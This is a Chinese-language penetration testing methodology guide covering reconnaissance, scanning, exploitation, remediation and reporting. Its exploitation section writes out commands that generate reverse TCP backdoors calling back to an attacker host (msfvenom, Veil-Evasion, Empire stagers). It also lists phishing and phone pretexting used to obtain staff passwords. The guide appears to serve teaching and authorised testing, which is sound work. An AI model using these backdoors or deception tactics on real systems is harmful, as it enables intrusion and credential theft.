渗透测试流程

1. 信息收集阶段

网络拓扑结构分析

  • 使用nmap扫描目标网络,获取目标主机IP地址和开放端口信息
  • 使用whois查询目标域名的注册信息和DNS服务器信息
  • 使用nslookup查询目标域名的IP地址和子域名信息
  • 使用traceroute获取目标主机的路由信息
  • 使用ping测试目标主机的可达性和响应时间
  • 使用社交工程学手段获取目标员工信息和组织架构信息
  • 使用公开信息收集工具(如Shodan)查询目标网络的设备和服务信息

域名信息收集

  • 使用whois工具获取目标域名的注册信息,包括注册人、注册商、注册日期、过期日期等。
  • 使用nslookup或dig工具查询目标域名的DNS记录,获取目标域名的IP地址。
  • 使用子域名枚举工具,如sublist3r、amass等,获取目标域名的所有子域名。
  • 使用网站爬虫工具,如SpiderFoot、theHarvester等,获取目标域名关联的其他域名、邮箱、IP地址等信息。

端口扫描

  • 使用nmap进行端口扫描,命令如下:
nmap -sS -p 1-65535 target_ip
  • 结果示例:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-01 15:34 CST
Nmap scan report for target_ip
Host is up (0.12s latency).
Not shown: 65530 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
2049/tcp  open  nfs
3306/tcp  open  mysql
5432/tcp  open  postgresql
8080/tcp  open  http-proxy
20000/tcp open  dnp
  • 解释:
    • -sS参数表示使用TCP SYN扫描方式;
    • -p参数表示扫描的端口范围,这里扫描了1-65535所有端口;
    • target_ip为目标IP地址。

操作系统识别

  • 使用nmap扫描目标IP地址,获取目标主机开放的端口和服务信息。
  • 使用nmap的操作系统识别功能,获取目标主机所使用的操作系统类型和版本信息。
  • 使用whois查询目标域名的注册信息,获取目标公司、联系人等信息。
  • 使用搜索引擎(如Google)搜索目标公司的网站、子域名等信息,获取目标公司的业务范围、技术架构等信息。
  • 使用社交媒体(如LinkedIn)搜索目标公司的员工信息,获取目标公司的组织结构、职责分工等信息。

服务识别

  • 使用nmap扫描目标IP地址,识别目标主机开放的端口和运行的服务。
  • 使用WhatWeb扫描目标网站,识别目标网站所使用的Web框架、CMS、Web服务器等信息。
  • 使用whois查询目标域名的注册信息,获取目标组织的联系方式和技术架构等信息。
  • 使用Google Hacking Database搜索目标组织的敏感信息,如用户名、密码、配置文件等。

Web应用程序识别

  • 使用搜索引擎和目录枚举工具,如Google Hacking Database、Baidu、Shodan等,来发现目标网站的存在。
  • 使用Whois查询工具获取目标网站的所有者信息。
  • 使用DNS查询工具来枚举目标网站的子域名。
  • 使用端口扫描工具,如Nmap、Masscan等,来确定目标网站上开放的端口和服务。
  • 使用Web应用程序识别工具,如Wappalyzer、WhatWeb等,来确定目标网站上使用的技术栈、框架和CMS等。

表格示例:

工具名称 功能描述
Google Hacking Database 使用Google搜索语法来发现目标网站的存在
Whois查询工具 获取目标网站的所有者信息
DNS查询工具 枚举目标网站的子域名
端口扫描工具 确定目标网站上开放的端口和服务
Web应用程序识别工具 确定目标网站上使用的技术栈、框架和CMS等

敏感信息收集- 通过搜索引擎查找相关公司网站,获取公司名称、业务范围、联系方式等敏感信息。

  • 使用WHOIS查询工具,获取目标网站的注册人、注册邮箱、IP地址等敏感信息。
  • 使用社交媒体平台,如LinkedIn、Facebook等,查找目标公司的员工信息、职位等敏感信息。
  • 使用在线工具,如网站漏洞扫描器、端口扫描器等,获取目标网站的漏洞信息、开放端口等敏感信息。
  • 通过邮件伪造、电话欺骗等方式,获取目标公司的敏感信息,如员工账号、密码等。

2. 漏洞扫描阶段

漏洞扫描工具选择

  • Nmap

    nmap -sS -sV -O target_IP

  • Nessus

    打开Nessus扫描器,输入目标IP地址,选择扫描模板,开始扫描

  • OpenVAS

    打开OpenVAS扫描器,输入目标IP地址,选择扫描模板,开始扫描

  • Burp Suite

    打开Burp Suite,配置代理,使用Burp Scanner进行扫描

  • Metasploit

    打开Metasploit,使用auxiliary模块进行扫描

  • Acunetix

    打开Acunetix,输入目标URL,选择扫描模板,开始扫描

  • sqlmap

    sqlmap -u "target_URL" --dbs

漏洞扫描目标选择

  • 漏洞扫描目标选择示例:
目标 描述
Web应用程序 使用Burp Suite、OWASP ZAP等工具对Web应用程序进行扫描
网络设备 使用Nmap、Angry IP Scanner等工具对网络设备进行扫描
操作系统 使用OpenVAS、Nessus等工具对操作系统进行扫描
数据库 使用SQLMap等工具对数据库进行扫描
无线网络 使用Aircrack-ng等工具对无线网络进行扫描

漏洞扫描结果分析

  • 漏洞扫描结果分析:
漏洞名称 漏洞等级 影响范围 建议处理方案
SQL注入漏洞 影响整个网站 对输入参数进行过滤和转义处理,使用参数化查询
XSS漏洞 影响用户信息安全 对用户输入进行过滤和转义处理,使用CSP等防护措施
未授权访问漏洞 影响部分功能 加强权限控制,限制敏感操作的访问权限

漏洞验证- 漏洞验证:

漏洞名称 漏洞描述 验证方式
SQL注入漏洞 通过注入恶意代码来获取数据库中的敏感信息或者修改数据库内容 在输入框中输入特定的SQL语句,观察网站是否返回异常信息
XSS漏洞 恶意用户在网站上插入脚本代码,当其他用户访问该页面时,脚本会被执行 在输入框中输入特定的脚本代码,观察网站是否执行该脚本
文件上传漏洞 允许用户上传文件,但没有对上传文件进行充分的验证和过滤,攻击者可以上传恶意文件 上传包含恶意代码的文件,观察网站是否正常处理该文件

3. 渗透攻击阶段

渗透攻击工具选择

  • 渗透攻击工具选择:

    工具名称 用途
    Nmap 端口扫描
    Metasploit 漏洞利用
    Burp Suite Web应用程序攻击
    Aircrack-ng 无线网络攻击
    Hydra 密码破解
    John the Ripper 密码破解
    Sqlmap SQL注入攻击
    Wireshark 网络流量分析
    Netcat 网络工具
    Hping 网络工具

渗透攻击方式选择

  • 渗透攻击方式选择:

    攻击方式 描述
    社交工程学 通过社交技巧获取目标系统的信息,如钓鱼邮件、电话诈骗等。
    漏洞利用 利用已知或未知漏洞攻击目标系统,如使用Metasploit框架等。
    密码破解 尝试破解目标系统的密码,如使用密码字典、暴力破解等。
    物理攻击 直接进入目标系统所在的物理环境进行攻击,如进入机房、拆卸硬件等。

渗透攻击结果分析

  • 渗透攻击结果分析:
    • 通过渗透测试工具获取的漏洞信息,如nmap、nessus等工具的扫描结果。
    • 通过手工测试获取的漏洞信息,如SQL注入、XSS等漏洞。
    • 分析漏洞的危害程度,如是否可利用、对系统的影响等。
    • 提出修复建议,如修补漏洞、升级补丁等。

渗透攻击后门植入- 使用Metasploit生成反向TCP后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > backdoor.exe

  • 使用Veil-Evasion生成反向TCP后门:

    veil-evasion.py
usestager/windows/meterpreter/rev_tcp
set LHOST <attacker IP>
set LPORT <attacker port>
generate

  • 使用Empire生成反向TCP后门:

    listeners
uselistener http
set Name http
set Host <attacker IP>
set Port <attacker port>
execute
back
usestager windows/launcher_bat
set Listener http
execute

表格:

后门类型 植入方法
Webshell 通过漏洞上传Webshell,或者在服务器上直接创建Webshell
Rootkit 修改系统内核或者驱动程序
Trojan 通过社会工程学手段诱骗用户下载安装
RAT 通过漏洞或者社会工程学手段植入远程控制软件

4. 漏洞修复阶段

漏洞修复建议

  • 漏洞修复建议:
    • 修复漏洞前先备份数据和系统。
    • 优先修复高危漏洞,其次再修复中危和低危漏洞。
    • 修复漏洞时要注意不要引入新的漏洞。
    • 对修复后的系统进行再次测试,以确保漏洞已经被修复。
    • 对修复后的系统进行监控和日志审计,及时发现新的漏洞或攻击行为。

漏洞修复跟踪- 漏洞修复跟踪:

漏洞编号 漏洞描述 修复状态 修复人员 修复时间
001 SQL注入漏洞 已修复 张三 2021-05-01
002 XSS漏洞 未修复 李四 -
003 文件上传漏洞 已修复 王五 2021-05-02

5. 报告编写阶段

渗透测试报告结构

  • 渗透测试报告结构:
    标题 内容
    1. 引言 对渗透测试的目的、范围、方法、工具等进行说明
    2. 测试过程 对测试的步骤、方法、结果进行详细描述
    3. 漏洞分析 对测试中发现的漏洞进行分析、评估和分类
    4. 风险评估 对漏洞的风险进行评估和分类,并提出相应的建议和措施
    5. 结论和建议 对测试结果进行总结,并提出相应的建议和措施
    6. 附录 包括测试过程中的截图、日志、代码等详细信息

报告编写要点

  • 报告编写要点:
    • 对测试结果进行详细描述,包括测试的目标、范围、方法和结果。
    • 列出所有发现的漏洞和安全问题,并按照优先级进行分类。
    • 对每个漏洞或安全问题进行详细描述,包括其影响、利用方法和建议的修复方案。
    • 提供截图、漏洞利用脚本等支持证据。
    • 针对每个漏洞或安全问题,提供相应的修复建议并给出修复建议的优先级。
    • 附上测试人员的联系方式,以便在需要时进行进一步沟通。

报告提交及漏洞公开风险评估- 报告提交及漏洞公开风险评估示例:

  • 将渗透测试报告提交给客户,并说明测试过程中发现的漏洞及其风险等级。
  • 对于高风险漏洞,需要在报告中提供详细的修复建议,并督促客户及时修复。
  • 在报告中评估漏洞公开的风险,对于可能会导致严重后果的漏洞,需要在报告中说明风险,并建议客户尽快修复。同时,需要提醒客户在修复之前谨慎处理漏洞信息,避免泄露给攻击者。